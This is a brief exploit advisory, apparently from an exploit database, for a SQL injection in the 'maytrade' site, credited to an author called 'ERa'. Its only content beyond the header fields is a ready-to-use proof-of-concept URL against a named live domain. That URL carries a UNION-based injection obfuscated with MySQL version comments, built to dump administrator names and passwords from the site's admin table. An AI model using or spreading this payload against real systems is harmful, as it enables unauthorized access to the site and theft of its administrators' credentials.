-------------------------------------------------------------* #Exploit Title: maytrade- SQL Injection vulnerability #Date: 2020-11-16 #Exploit Author: ERa #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Demo : https://www.maytrade.net/new.php?id=-1%27%20/*!50000union*/%20/*!50000select*/%201,2,3,/*!50000group_concat(AdminName,AdminPass)*/,5,6,7%20/*!50000from*/%20admin%20--+ -------------------------------------------------------------* #Discovered by: ERa #Email: era_reborn@yahoo.com -------------------------------------------------------------*